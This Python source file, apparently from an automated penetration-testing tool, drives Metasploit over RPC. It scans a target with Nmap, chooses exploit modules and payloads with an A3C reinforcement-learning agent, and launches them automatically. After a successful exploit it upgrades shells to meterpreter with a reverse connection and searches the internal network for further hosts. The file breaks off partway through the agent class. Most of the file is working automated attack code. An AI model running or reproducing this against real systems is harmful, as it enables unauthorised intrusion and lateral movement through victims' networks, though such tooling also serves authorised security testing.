#!/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
import time
import datetime
import re
import json
import csv
import codecs
import random
import ipaddress
import configparser
import msgpack
import http.client
import threading
import numpy as np
from docopt import docopt
from keras.models import *
from keras.layers import *
from keras import backend as K
import tensorflow as tf

# Warnning for TensorFlow acceleration is not shown.
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'

# Index of target host's state (s).
ST_OS_TYPE = 0  # OS types (unix, linux, windows, osx..).
ST_PORT_NUM = 1  # Port number (21, 80, 445..).
ST_PROTOCOL = 2  # Protocol types (tcp, udp).
ST_SERV_NAME = 3  # Product name on Port.
ST_SERV_VER = 4  # Product version.
ST_PROMPT = 5  # Exploit module types.
ST_TARGET = 6  # target types (0, 1, 2..).


# Metasploit interface.
class Msgrpc:
    def __init__(self, option=[]):
        self.host = option.get('host') or "127.0.0.1"
        self.port = option.get('port') or 55552
        self.uri = option.get('uri') or "/api/"
        self.ssl = option.get('ssl') or False
        self.authenticated = False
        self.token = False
        self.headers = {"Content-type": "binary/message-pack"}
        if self.ssl:
            self.client = http.client.HTTPSConnection(self.host, self.port)
        else:
            self.client = http.client.HTTPConnection(self.host, self.port)

    # Call RPC API.
    def call(self, meth, option):
        if meth != "auth.login":
            if not self.authenticated:
                print('[*] MsfRPC: Not Authenticated')
                exit(1)

        if meth != "auth.login":
            option.insert(0, self.token)

        option.insert(0, meth)
        params = msgpack.packb(option)
        self.client.request("POST", self.uri, params, self.headers)
        resp = self.client.getresponse()
        return msgpack.unpackb(resp.read())

    # Log in to RPC Server.
    def login(self, user, password):
        ret = self.call('auth.login', [user, password])
        if ret.get(b'result') == b'success':
            self.authenticated = True
            self.token = ret.get(b'token')
            return True
        else:
            print('[*] MsfRPC: Authentication failed')
            exit(1)

    # Send Metasploit command.
    def send_command(self, console_id, command, visualization, sleep=0.1):
        _ = self.call('console.write', [console_id, command])
        time.sleep(sleep)
        ret = self.call('console.read', [console_id])
        if visualization:
            try:
                print(ret.get(b'data').decode('utf-8'))
            except Exception as e:
                print("[*] type:{0}".format(type(e)))
                print("[*] args:{0}".format(e.args))
                print("[*] {0}".format(e))
                print('[*] Send_command is exception')
        return ret

    # Get all modules.
    def get_module_list(self, module_type):
        ret = {}
        if module_type == 'exploit':
            ret = self.call('module.exploits', [])
        elif module_type == 'auxiliary':
            ret = self.call('module.auxiliary', [])
        elif module_type == 'post':
            ret = self.call('module.post', [])
        elif module_type == 'payload':
            ret = self.call('module.payloads', [])
        elif module_type == 'encoder':
            ret = self.call('module.encoders', [])
        elif module_type == 'nop':
            ret = self.call('module.nops', [])
        byte_list = ret[b'modules']
        string_list = []
        for module in byte_list:
            string_list.append(module.decode('utf-8'))
        return string_list

    # Get module detail information.
    def get_module_info(self, module_type, module_name):
        return self.call('module.info', [module_type, module_name])

    # Get payload that compatible module.
    def get_compatible_payload_list(self, module_name):
        ret = self.call('module.compatible_payloads', [module_name])
        byte_list = ret[b'payloads']
        string_list = []
        for module in byte_list:
            string_list.append(module.decode('utf-8'))
        return string_list

    # Get payload that compatible target.
    def get_target_compatible_payload_list(self, module_name, target_num):
        ret = self.call('module.target_compatible_payloads', [module_name, target_num])
        byte_list = ret[b'payloads']
        string_list = []
        for module in byte_list:
            string_list.append(module.decode('utf-8'))
        return string_list

    # Get module options.
    def get_module_options(self, module_type, module_name):
        return self.call('module.options', [module_type, module_name])

    # Execute module.
    def execute_module(self, module_type, module_name, options):
        ret = self.call('module.execute', [module_type, module_name, options])
        job_id = ret[b'job_id']
        uuid = ret[b'uuid'].decode('utf-8')
        return job_id, uuid

    # Get job list.
    def get_job_list(self):
        jobs = self.call('job.list', [])
        byte_list = jobs.keys()
        job_list = []
        for job_id in byte_list:
            job_list.append(int(job_id.decode('utf-8')))
        return job_list

    # Get job detail information.
    def get_job_info(self, job_id):
        return self.call('job.info', [job_id])

    # Stop job.
    def stop_job(self, job_id):
        return self.call('job.stop', [job_id])

    # Get session list.
    def get_session_list(self):
        return self.call('session.list', [])

    # Stop session.
    def stop_session(self, session_id):
        _ = self.call('session.stop', [str(session_id)])

    # Stop meterpreter session.
    def stop_meterpreter_session(self, session_id):
        _ = self.call('session.meterpreter_session_detach', [str(session_id)])

    # Execute shell.
    def execute_shell(self, session_id, cmd):
        ret = self.call('session.shell_write', [str(session_id), cmd])
        return ret[b'write_count'].decode('utf-8')

    # Get executing shell result.
    def get_shell_result(self, session_id, read_pointer):
        ret = self.call('session.shell_read', [str(session_id), read_pointer])
        seq = ret[b'seq'].decode('utf-8')
        data = ret[b'data'].decode('utf-8')
        return seq, data

    # Execute meterpreter.
    def execute_meterpreter(self, session_id, cmd):
        ret = self.call('session.meterpreter_write', [str(session_id), cmd])
        return ret[b'result'].decode('utf-8')

    # Execute single meterpreter.
    def execute_meterpreter_run_single(self, session_id, cmd):
        ret = self.call('session.meterpreter_run_single', [str(session_id), cmd])
        return ret[b'result'].decode('utf-8')

    # Get executing meterpreter result.
    def get_meterpreter_result(self, session_id):
        ret = self.call('session.meterpreter_read', [str(session_id)])
        return ret[b'data'].decode('utf-8')

    # Upgrade shell session to meterpreter.
    def upgrade_shell_session(self, session_id, lhost, lport):
        ret = self.call('session.shell_upgrade', [str(session_id), lhost, lport])
        return ret[b'result'].decode('utf-8')

    # Log out from RPC Server.
    def logout(self):
        ret = self.call('auth.logout', [self.token])
        if ret.get(b'result') == b'success':
            self.authenticated = False
            self.token = ''
            return True
        else:
            print('[*] MsfRPC: Authentication failed')
            exit(1)

    # Disconnection.
    def termination(self, console_id):
        # Kill a console.
        ret = self.call('console.session_kill', [console_id])
        # Log out
        ret = self.logout()


# Metasploit's environment.
class Metasploit:
    def __init__(self, target_ip='127.0.0.1'):
        self.rhost = target_ip
        # Read config.ini.
        full_path = os.path.dirname(os.path.abspath(__file__))
        config = configparser.ConfigParser()
        try:
            config.read(os.path.join(full_path, 'config.ini'))
        except FileExistsError as err:
            print('[*] File exists error: {0}', err)
            sys.exit(1)
        # Common setting value.
        server_host = config['Common']['server_host']
        server_port = int(config['Common']['server_port'])
        msgrpc_user = config['Common']['msgrpc_user']
        msgrpc_pass = config['Common']['msgrpc_pass']
        self.timeout = int(config['Common']['timeout'])
        self.max_attempt = int(config['Common']['max_attempt'])
        self.save_path = os.path.join(full_path, config['Common']['save_path'])
        self.save_file = os.path.join(self.save_path, config['Common']['save_file'])
        self.data_path = os.path.join(full_path, config['Common']['data_path'])

        # Metasploit options setting value.
        self.lhost = config['Metasploit']['lhost']
        self.lport = config['Metasploit']['lport']

        # Nmap options setting value.
        self.nmap_option = config['Nmap']['option']
        self.nmap_timeout = config['Nmap']['timeout']

        # A3C setting value.
        self.train_worker_num = int(config['A3C']['train_worker_num'])
        self.train_max_num = int(config['A3C']['train_max_num'])
        self.train_max_steps = int(config['A3C']['train_max_steps'])
        self.train_tmax = int(config['A3C']['train_tmax'])
        self.test_worker_num = int(config['A3C']['test_worker_num'])

        # State setting value.
        self.state = [0, 0, 0, 0, 0, 0, 0]  # Deep Exploit's state(s).
        self.os_type = str(config['State']['os_type']).split('@')  # OS type.
        self.service_list = str(config['State']['services']).split('@')  # Product name.
        self.protocol_list = str(config['State']['protocols']).split('@')  # Protocol type.

        # Report setting value.
        self.report_path = os.path.join(full_path, config['Report']['report_path'])

        self.client = Msgrpc({'host': server_host, 'port': server_port})  # Create Msgrpc instance.
        self.client.login(msgrpc_user, msgrpc_pass)  # Log in to RPC Server.
        self.console_id = self.get_console()  # Get MSFconsole ID.

        # Set OS type to state.
        self.target_os = self.set_state_os()

    # Parse.
    def cutting_strings(self, pattern, target):
        return re.findall(pattern, target)

    # Normalization.
    def normalization(self, target_idx):
        if target_idx == ST_PORT_NUM:
            port_num = int(self.state[ST_PORT_NUM])
            port_num_mean = 65535 / 2
            self.state[ST_PORT_NUM] = (port_num - port_num_mean) / port_num_mean
        elif target_idx == ST_PROTOCOL:
            protocol_num = self.state[ST_PROTOCOL]
            protocol_num_mean = len(self.protocol_list) / 2
            self.state[ST_PROTOCOL] = (protocol_num - protocol_num_mean) / protocol_num_mean
        elif target_idx == ST_SERV_NAME:
            service_num = self.state[ST_SERV_NAME]
            service_num_mean = len(self.service_list) / 2
            self.state[ST_SERV_NAME] = (service_num - service_num_mean) / service_num_mean
        elif target_idx == ST_PROMPT:
            prompt_num = self.state[ST_PROMPT]
            prompt_num_mean = len(com_exploit_list) / 2
            self.state[ST_PROMPT] = (prompt_num - prompt_num_mean) / prompt_num_mean

    # Create MSFconsole.
    def get_console(self):
        # Create a console.
        ret = self.client.call('console.create', [])
        console_id = ret.get(b'id')
        _ = self.client.call('console.read', [console_id])
        return console_id

    # Set OS type to state.
    def set_state_os(self):
        os_raw = ''
        time_count = 0
        hosts_cmd = 'hosts -c address,os_name -R ' + self.rhost + '\n'
        while True:
            ret = self.client.send_command(self.console_id, hosts_cmd, False)
            os_raw = ret.get(b'data').decode('utf-8')
            if 'Hosts' in os_raw:
                break
            if self.timeout == time_count:
                self.client.termination(self.console_id)
                print('[*] Timeout: "{0}"'.format(hosts_cmd))
                break
            time_count += 1
        os_name = self.cutting_strings(self.rhost + r'  (.*)', os_raw)
        if len(os_name) == 0:
            os_name = 'unknown'
        os_name = os_name[0].lower()
        self.state[ST_OS_TYPE] = len(self.os_type) - 1
        for (idx, os_type) in enumerate(self.os_type):
            if os_name in os_type:
                self.state[ST_OS_TYPE] = idx
                break
        return os_name

    # Get current time.
    def get_current_time(self):
        now = datetime.datetime.now()
        now_time = datetime.datetime(now.year, now.month, now.day, now.hour, now.minute, now.second)
        return now_time

    # Execute Nmap.
    def execute_nmap(self):
        print('[+] Execute Nmap.')
        if os.path.exists(os.path.join(self.data_path, 'target_info_' + self.rhost + '.json')) is False:
            print('[*] Executing...')
            print('[*] Start time: {0}'.format(self.get_current_time()))

            # Execute Nmap.
            nmap_cmd = 'db_nmap ' + self.nmap_option + ' ' + self.rhost + '\n'
            _ = self.client.call('console.write', [self.console_id, nmap_cmd])
            time.sleep(3.0)
            time_count = 0
            while True:
                # Judgement of Nmap finishing.
                ret = self.client.call('console.read', [self.console_id])
                status = ret.get(b'busy')
                if status is False:
                    print('[*] End time  : {0}'.format(self.get_current_time()))
                    break
                if self.nmap_timeout == time_count:
                    self.client.termination(self.console_id)
                    print('[*] Timeout   : {0}'.format(nmap_cmd))
                    print('[*] End time  : {0}'.format(self.get_current_time()))
                    break
                time.sleep(1.0)
                time_count += 1

            _ = self.client.call('console.destroy', [self.console_id])
            ret = self.client.call('console.create', [])
            self.console_id = ret.get(b'id')
            _ = self.client.call('console.read', [self.console_id])
        else:
            print('[*] Nmap already scanned.')

    # Get port list from Nmap's result.
    def get_port_list(self):
        print('[+] Get port list.')
        port_list = []
        proto_list = []
        info_list = []
        if os.path.exists(os.path.join(self.data_path, 'target_info_' + rhost + '.json')) is False:
            nmap_result = ''
            services_cmd = 'services -c port,proto,info -R ' + self.rhost + '\n'
            _ = self.client.call('console.write', [self.console_id, services_cmd])
            time.sleep(3.0)
            time_count = 0
            while True:
                # Judgement of 'services' command finishing.
                ret = self.client.call('console.read', [self.console_id])
                nmap_result += ret.get(b'data').decode('utf-8')
                status = ret.get(b'busy')
                if status is False:
                    break
                if self.nmap_timeout == time_count:
                    self.client.termination(self.console_id)
                    print('[*] Timeout: "{0}"'.format(services_cmd))
                    break
                time.sleep(1.0)
                time_count += 1

            port_list = self.cutting_strings(self.rhost + r'  ([0-9]{1,5})', nmap_result)
            proto_list = self.cutting_strings(self.rhost + r'  [0-9]{1,5} .*(tcp|udp) ', nmap_result)
            info_list = self.cutting_strings(self.rhost + r'  [0-9]{1,5} .*[tcp|udp]    (.*)', nmap_result)
            if len(port_list) == 0:
                print('[*] No open port.')
                print('[*] Shutdown Deep Exploit...')
                self.client.termination(self.console_id)
                exit(1)
        else:
            # Get target host information from local file.
            saved_file = os.path.join(self.data_path, 'target_info_' + self.rhost + '.json')
            print('[*] Loading target tree from local file: {0}'.format(saved_file))
            fin = codecs.open(saved_file, 'r', 'utf-8')
            target_tree = json.load(fin)
            fin.close()
            key_list = list(target_tree.keys())
            for key in key_list[1:]:
                port_list.append(key)

        return port_list, proto_list, info_list

    # Get Exploit module list.
    def get_exploit_list(self):
        print('[+] Get exploit list.')
        all_exploit_list = []
        if os.path.exists(os.path.join(self.data_path, 'exploit_list.csv')) is False:
            print('[*] Loading exploit list from Metasploit.')

            # Get Exploit module list.
            all_exploit_list = []
            exploit_candidate_list = self.client.get_module_list('exploit')
            for exploit in exploit_candidate_list:
                module_info = self.client.get_module_info('exploit', exploit)
                if module_info[b'rank'].decode('utf-8') in {'excellent', 'great', 'good'}:
                    all_exploit_list.append(exploit)

            # Save Exploit module list to local file.
            print('[*] Loaded exploit num: ' + str(len(all_exploit_list)))
            fout = codecs.open(os.path.join(self.data_path, 'exploit_list.csv'), 'w', 'utf-8')
            for item in all_exploit_list:
                fout.write(item + '\n')
            fout.close()
            print('[*] Saved exploit list.')
        else:
            # Get exploit module list from local file.
            local_file = os.path.join(self.data_path, 'exploit_list.csv')
            print('[*] Loading exploit list from local file: ' + local_file)
            fin = codecs.open(local_file, 'r', 'utf-8')
            for item in fin:
                all_exploit_list.append(item.rstrip('\n'))
            fin.close()
        return all_exploit_list

    # Get payload list.
    def get_payload_list(self, module_name='', target_num=''):
        print('[+] Get payload list.')
        all_payload_list = []
        if os.path.exists(os.path.join(self.data_path, 'payload_list.csv')) is False or module_name != '':
            print('[*] Loading payload list from Metasploit.')

            # Get payload list.
            payload_list = []
            if module_name == '':
                # Get all Payloads.
                payload_list = self.client.get_module_list('payload')

                # Save payload list to local file.
                fout = codecs.open(os.path.join(self.data_path, 'payload_list.csv'), 'w', 'utf-8')
                for item in payload_list:
                    fout.write(item + '\n')
                fout.close()
                print('[*] Saved payload list.')
            elif target_num == '':
                # Get payload that compatible exploit module.
                payload_list = self.client.get_compatible_payload_list(module_name)
            else:
                # Get payload that compatible target.
                payload_list = self.client.get_target_compatible_payload_list(module_name, target_num)
        else:
            # Get payload list from local file.
            local_file = os.path.join(self.data_path, 'payload_list.csv')
            print('[*] Loading payload list from local file: ' + local_file)
            payload_list = []
            fin = codecs.open(local_file, 'r', 'utf-8')
            for item in fin:
                payload_list.append(item.rstrip('\n'))
            fin.close()
        return payload_list

    # Reset state (s).
    def reset_state(self, exploit_tree, target_tree):
        # Randomly select target port number.
        port_num = com_port_list[random.randint(0, len(com_port_list) - 1)]
        service_name = target_tree[port_num]['prod_name']
        if service_name == 'unknown':
            return True, None, None, None, None

        # Set port number to state.
        if com_indicate_flag:
            self.state[ST_PORT_NUM] = int(target_tree['origin_port'])
        else:
            self.state[ST_PORT_NUM] = int(port_num)
        self.normalization(ST_PORT_NUM)

        # Set product name (index) to state.
        for (idx, service) in enumerate(self.service_list):
            if service == service_name:
                self.state[ST_SERV_NAME] = idx
                break
        self.normalization(ST_SERV_NAME)

        # Set version to state.
        self.state[ST_SERV_VER] = target_tree[port_num]['version']

        # Set protocol type (index) to state.
        for (idx, tmp_protocol) in enumerate(self.protocol_list):
            if tmp_protocol == target_tree[port_num]['protocol']:
                self.state[ST_PROTOCOL] = idx
                break
        self.normalization(ST_PROTOCOL)

        # Set exploit module type (index) to state.
        module_list = target_tree[port_num]['exploit']

        # Randomly select exploit module.
        module_name = ''
        module_info = []
        while True:
            module_name = module_list[random.randint(0, len(module_list) - 1)]
            for (idx, exploit) in enumerate(com_exploit_list):
                exploit = 'exploit/' + exploit
                if exploit == module_name:
                    self.state[ST_PROMPT] = idx
                    break
            self.normalization(ST_PROMPT)
            break

        # Randomly select target.
        module_name = module_name[8:]
        target_list = exploit_tree[module_name]['target_list']
        targets_num = target_list[random.randint(0, len(target_list) - 1)]
        self.state[ST_TARGET] = int(targets_num)

        # Set target information for display.
        target_info = {'protocol': target_tree[port_num]['protocol'],
                       'prod_name': service_name, 'version': target_tree[port_num]['version'], 'exploit': module_name}
        if com_indicate_flag:
            port_num = target_tree['origin_port']
        target_info['port'] = str(port_num)

        return False, self.state, exploit_tree[module_name]['targets'][targets_num], target_list, target_info

    # Get state (s).
    def get_state(self, exploit_tree, target_tree, port_num, exploit, target):
        # Get product name.
        service_name = target_tree[port_num]['prod_name']
        if service_name == 'unknown':
            return True, None, None, None

        # Set port number to state.
        if com_indicate_flag:
            self.state[ST_PORT_NUM] = int(target_tree['origin_port'])
        else:
            self.state[ST_PORT_NUM] = int(port_num)
        self.normalization(ST_PORT_NUM)

        # Set product name (index) to state.
        for (idx, service) in enumerate(self.service_list):
            if service == service_name:
                self.state[ST_SERV_NAME] = idx
                break
        self.normalization(ST_SERV_NAME)

        # Set version to state.
        self.state[ST_SERV_VER] = target_tree[port_num]['version']

        # Set protocol type (index) to state.
        for (idx, tmp_protocol) in enumerate(self.protocol_list):
            if tmp_protocol == target_tree[port_num]['protocol']:
                self.state[ST_PROTOCOL] = idx
                break
        self.normalization(ST_PROTOCOL)

        # Select exploit module (index).
        for (idx, temp_exploit) in enumerate(com_exploit_list):
            temp_exploit = 'exploit/' + temp_exploit
            if exploit == temp_exploit:
                self.state[ST_PROMPT] = idx
                break
        self.normalization(ST_PROMPT)

        # Select target.
        self.state[ST_TARGET] = int(target)

        # Set target information for display.
        target_info = {'protocol': target_tree[port_num]['protocol'],
                       'prod_name': service_name, 'version': target_tree[port_num]['version'],
                       'exploit': exploit[8:], 'target': target}
        if com_indicate_flag:
            port_num = target_tree['origin_port']
        target_info['port'] = str(port_num)

        return False, self.state, exploit_tree[exploit[8:]]['targets'][target], target_info

    # Get available payload list.
    def get_available_actions(self, payload_list):
        payload_num_list = []
        for self_payload in payload_list:
            for (idx, payload) in enumerate(com_payload_list):
                if payload == self_payload:
                    payload_num_list.append(idx)
                    break
        return payload_num_list

    # Show banner of successfully exploitation.
    def show_banner_bingo(self, prod_name, version, exploit, payload, sess_type, delay_time=2.0):
        banner = """
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
　　　    ██████╗ ██╗███╗   ██╗ ██████╗  ██████╗ ██╗██╗██╗
          ██╔══██╗██║████╗  ██║██╔════╝ ██╔═══██╗██║██║██║
          ██████╔╝██║██╔██╗ ██║██║  ███╗██║   ██║██║██║██║
          ██╔══██╗██║██║╚██╗██║██║   ██║██║   ██║╚═╝╚═╝╚═╝
          ██████╔╝██║██║ ╚████║╚██████╔╝╚██████╔╝██╗██╗██╗
          ╚═════╝ ╚═╝╚═╝  ╚═══╝ ╚═════╝  ╚═════╝ ╚═╝╚═╝╚═╝
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
        """ + prod_name + '/' + version + ' ' + exploit + ' ' + payload + ' ' + sess_type + '\n'
        print(banner)
        time.sleep(delay_time)

    # Set Metasploit options.
    def set_options(self, target_info, selected_payload, exploit_tree):
        options = exploit_tree[target_info['exploit']]['options']
        key_list = options.keys()
        option = {}
        for key in key_list:
            if options[key]['required'] is True:
                sub_key_list = options[key].keys()
                if 'default' in sub_key_list:
                    # If "user_specify" is not null, set "user_specify" value to the key.
                    if options[key]['user_specify'] == '':
                        option[key] = options[key]['default']
                    else:
                        option[key] = options[key]['user_specify']
                else:
                    option[key] = '0'
        option['RHOST'] = self.rhost
        option['RPORT'] = int(target_info['port'])
        if selected_payload != '':
            option['PAYLOAD'] = selected_payload
        return option

    # Execute exploit.
    def execute_exploit(self, action, thread_name, thread_type, target_list, target_info, step, exploit_tree, frame=0):
        # Set target.
        target = ''
        if thread_type == 'learning':
            target = str(self.state[ST_TARGET])
        else:
            # If testing, 'target_list' is target number (not list).
            target = target_list
            # If trial exceed maximum number of trials, finish trial at current episode.
            if step > self.max_attempt - 1:
                return self.state, None, True, {}

        # Set payload.
        selected_payload = ''
        if action != 'no payload':
            selected_payload = com_payload_list[action]
        else:
            # No payload
            selected_payload = ''

        # Set options.
        option = self.set_options(target_info, selected_payload, exploit_tree)

        # Execute exploit.
        reward = 0
        message = ''
        session_list = {}
        done = False
        job_id, uuid = self.client.execute_module('exploit', target_info['exploit'], option)
        if uuid is not None:
            # Waiting job to finish.
            time_count = 0
            while True:
                job_id_list = self.client.get_job_list()
                if job_id in job_id_list:
                    time.sleep(1)
                else:
                    break
                if self.timeout == time_count:
                    self.client.stop_job(str(job_id))
                    break
                time_count += 1
            sessions = self.client.get_session_list()
            key_list = sessions.keys()
            if len(key_list) != 0:
                # Probably successfully of exploitation (but unsettled).
                for key in key_list:
                    exploit_uuid = sessions[key][b'exploit_uuid'].decode('utf-8')
                    if uuid == exploit_uuid:
                        # Successfully of exploitation.
                        reward = 1
                        done = True
                        session_id = int(key)
                        session_type = sessions[key][b'type'].decode('utf-8')
                        session_port = str(sessions[key][b'session_port'])
                        session_exploit = sessions[key][b'via_exploit'].decode('utf-8')
                        session_payload = sessions[key][b'via_payload'].decode('utf-8')
                        message = 'bingo!! '

                        # Gather reporting items.
                        module_info = self.client.get_module_info('exploit', session_exploit)
                        vuln_name = module_info[b'name'].decode('utf-8')
                        description = module_info[b'description'].decode('utf-8')
                        ref_list = module_info[b'references']
                        reference = ''
                        for item in ref_list:
                            reference += '[' + item[0].decode('utf-8') + ']' + '@' + item[1].decode('utf-8') + '@@'
                        with codecs.open(os.path.join(self.report_path, thread_name + '.csv'), 'a', 'utf-8') as fout:
                            bingo = [self.rhost,
                                     session_port,
                                     target_info['protocol'],
                                     target_info['prod_name'],
                                     str(target_info['version']),
                                     vuln_name,
                                     description,
                                     session_type,
                                     session_exploit,
                                     target,
                                     session_payload,
                                     reference]
                            writer = csv.writer(fout)
                            writer.writerow(bingo)

                        # Display banner.
                        self.show_banner_bingo(target_info['prod_name'],
                                               str(target_info['version']),
                                               session_exploit,
                                               session_payload,
                                               session_type)

                        # Disconnect session.
                        if thread_type == 'learning':
                            self.client.stop_session(key)
                            self.client.stop_meterpreter_session(key)
                        # Create session list for post-exploitation.
                        else:
                            session_list['id'] = session_id
                            session_list['type'] = session_type
                            session_list['port'] = session_port
                            session_list['exploit'] = session_exploit
                            session_list['target'] = target
                            session_list['payload'] = session_payload
                        break
                else:
                    # Failure exploitation.
                    reward = -1
                    message = 'failure '
            else:
                # Failure exploitation.
                reward = -1
                message = 'failure '
        else:
            # Time out or internal error of Metasploit.
            done = True
            reward = 0
            message = 'time out'

        # Output result to console.
        print('[*] {0:04d}/{1:04d} : {2:03d}/{3:03d} {4} reward:{5} {6} {7}({8}/{9}) '
              '{10}/{11} | {12} | {13} | {14}'.format(frame,
                                                      MAX_TRAIN_NUM,
                                                      step,
                                                      MAX_STEPS,
                                                      thread_name,
                                                      str(reward),
                                                      message,
                                                      self.rhost,
                                                      target_info['protocol'],
                                                      target_info['port'],
                                                      target_info['prod_name'],
                                                      target_info['version'],
                                                      target_info['exploit'],
                                                      selected_payload,
                                                      target))
        # Set next state (s')
        targets_num = 0
        if thread_type == 'learning' and len(target_list) != 0:
            targets_num = random.randint(0, len(target_list) - 1)
        self.state[ST_TARGET] = targets_num

        return self.state, reward, done, session_list

    # Execute post exploit.
    def execute_post_exploit(self, session_id, session_type):
        print('[+] Execute post exploitation.')
        if session_type == 'shell' or session_type == 'powershell':
            # Upgrade shell session to meterpreter.
            status = self.client.upgrade_shell_session(session_id, self.lhost, 4444)
            if status == 'success':
                # Successfully of reverse connect.
                sessions = self.client.get_session_list()
                session_list = list(sessions.keys())
                session_list.sort()
                session_id = session_list[len(session_list) - 1]

                # Search other servers in internal network.
                internal_ip_list = self.get_internal_ip(session_id)
                print('[*] Internal server list.\n{0}'.format(internal_ip_list))
                # TODO: deep exploit to other internal servers.
        elif session_type == 'meterpreter':
            # Search other servers in internal network.
            internal_ip_list = self.get_internal_ip(session_id)
            print('[*] Internal server list.\n{0}'.format(internal_ip_list))
            # TODO: deep exploit to other internal servers.
        else:
            # TODO: must explore other session type.
            print('[*] unknown session type.')
            return False
        return True

    # Execute post exploit.
    def get_internal_ip(self, session_id):
        # Execute "arp" of Meterpreter command.
        print('[*] Searching internal servers..')
        cmd = 'arp\n'
        _ = self.client.execute_meterpreter(session_id, cmd)
        # _ = self.client.execute_meterpreter_run_single(session_id, cmd)
        data = self.client.get_meterpreter_result(session_id)
        temp_list = self.cutting_strings(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})', data)
        internal_ip_list = []
        for ip_addr in temp_list:
            if ip_addr != self.lhost:
                internal_ip_list.append(ip_addr)
        return internal_ip_list


# Constants of LocalBrain
MIN_BATCH = 5
LOSS_V = .5  # v loss coefficient
LOSS_ENTROPY = .01  # entropy coefficient
LEARNING_RATE = 5e-3
RMSPropDecaly = 0.99

# Params of advantage (Bellman equation)
GAMMA = 0.99
N_STEP_RETURN = 5
GAMMA_N = GAMMA ** N_STEP_RETURN

TRAIN_WORKERS = 10  # Thread number of learning.
TEST_WORKER = 1  # Thread number of testing (default 1)
MAX_STEPS = 20  # Maximum step number.
MAX_TRAIN_NUM = 5000  # Learning number of each thread.
Tmax = 5  # Updating step period of each thread.

# Params of epsilon greedy
EPS_START = 0.5
EPS_END = 0.0
EPS_STEPS = MAX_STEPS * TRAIN_WORKERS


# ParameterServer
class ParameterServer:
    def __init__(self):
        # Identify by name to weights by the thread name (Name Space).
        with tf.variable_scope("parameter_server"):
            # Define neural network.
            self.model = self._build_model()

        # Declare server params.
        self.weights_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="parameter_server")
        # Define optimizer.
        self.optimizer = tf.train.RMSPropOptimizer(LEARNING_RATE, RMSPropDecaly)

    # Define neural network.
    def _build_model(self):
        l_input = Input(batch_shape=(None, NUM_STATES))
        l_dense1 = Dense(50, activation='relu')(l_input)
        l_dense2 = Dense(100, activation='relu')(l_dense1)
        l_dense3 = Dense(200, activation='relu')(l_dense2)
        out_actions = Dense(NUM_ACTIONS, activation='softmax')(l_dense3)
        out_value = Dense(1, activation='linear')(l_dense3)
        model = Model(inputs=[l_input], outputs=[out_actions, out_value])
        return model


# LocalBrain
class LocalBrain:
    def __init__(self, name, parameter_server):
        with tf.name_scope(name):
            # s, a, r, s', s' terminal mask
            self.train_queue = [[], [], [], [], []]
            K.set_session(SESS)

            # Define neural network.
            self.model = self._build_model()
            # Define learning method.
            self._build_graph(name, parameter_server)

    # Define neural network.
    def _build_model(self):
        l_input = Input(batch_shape=(None, NUM_STATES))
        l_dense1 = Dense(50, activation='relu')(l_input)
        l_dense2 = Dense(100, activation='relu')(l_dense1)
        l_dense3 = Dense(200, activation='relu')(l_dense2)
        out_actions = Dense(NUM_ACTIONS, activation='softmax')(l_dense3)
        out_value = Dense(1, activation='linear')(l_dense3)
        model = Model(inputs=[l_input], outputs=[out_actions, out_value])
        # Have to initialize before threading
        model._make_predict_function()
        return model

    # Define learning method by TensorFlow.
    def _build_graph(self, name, parameter_server):
        self.s_t = tf.placeholder(tf.float32, shape=(None, NUM_STATES))
        self.a_t = tf.placeholder(tf.float32, shape=(None, NUM_ACTIONS))
        # Not immediate, but discounted n step reward
        self.r_t = tf.placeholder(tf.float32, shape=(None, 1))

        p, v = self.model(self.s_t)

        # Define loss function.
        log_prob = tf.log(tf.reduce_sum(p * self.a_t, axis=1, keep_dims=True) + 1e-10)
        advantage = self.r_t - v
        loss_policy = - log_prob * tf.stop_gradient(advantage)
        # Minimize value error
        loss_value = LOSS_V * tf.square(advantage)
        # Maximize entropy (regularization)
        entropy = LOSS_ENTROPY * tf.reduce_sum(p * tf.log(p + 1e-10), axis=1, keep_dims=True)
        self.loss_total = tf.reduce_mean(loss_policy + loss_value + entropy)

        # Define weight.
        self.weights_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=name)
        # Define grads.
        self.grads = tf.gradients(self.loss_total, self.weights_params)

        # Define updating weight of ParameterServe
        self.update_global_weight_params = \
            parameter_server.optimizer.apply_gradients(zip(self.grads, parameter_server.weights_params))

        # Define copying weight of ParameterServer to LocalBrain.
        self.pull_global_weight_params = [l_p.assign(g_p)
                                          for l_p, g_p in zip(self.weights_params, parameter_server.weights_params)]

        # Define copying weight of LocalBrain to ParameterServer.
        self.push_local_weight_params = [g_p.assign(l_p)
                                         for g_p, l_p in zip(parameter_server.weights_params, self.weights_params)]

    # Pull ParameterServer weight to local thread.
    def pull_parameter_server(self):
        SESS.run(self.pull_global_weight_params)

    # Push local thread weight to ParameterServer.
    def push_parameter_server(self):
        SESS.run(self.push_local_weight_params)

    # Updating weight using grads of LocalBrain (learning).
    def update_parameter_server(self):
        if len(self.train_queue[0]) < MIN_BATCH:
            return

        print('[+] Update LocalBrain weight to ParameterServer.')
        s, a, r, s_, s_mask = self.train_queue
        self.train_queue = [[], [], [], [], []]
        s = np.vstack(s)
        a = np.vstack(a)
        r = np.vstack(r)
        s_ = np.vstack(s_)
        s_mask = np.vstack(s_mask)
        _, v = self.model.predict(s_)

        # Set v to 0 where s_ is terminal state
        r = r + GAMMA_N * v * s_mask
        feed_dict = {self.s_t: s, self.a_t: a, self.r_t: r}  # data of updating weight.
        SESS.run(self.update_global_weight_params, feed_dict)  # Update ParameterServer weight.

    # Return probability of action usin state (s).
    def predict_p(self, s):
        p, v = self.model.predict(s)
        return p

    def train_push(self, s, a, r, s_):
        self.train_queue[0].append(s)
        self.train_queue[1].append(a)
        self.train_queue[2].append(r)

        if s_ is None:
            self.train_queue[3].append(NONE_STATE)
            self.train_queue[4].append(0.)
        else:
            self.train_queue[3].append(s_)
            self.train_queue[4].append(1.)


# Agent
class Agent:
    def __init__(self, name, parameter_server):
        self.brain = LocalBrain(name, parameter_server)
        self.memory = []  # Memory of s,a,r,s_
        self.R = 0.  # Time discounted total reward.

    def act(self, s, available_action_list):
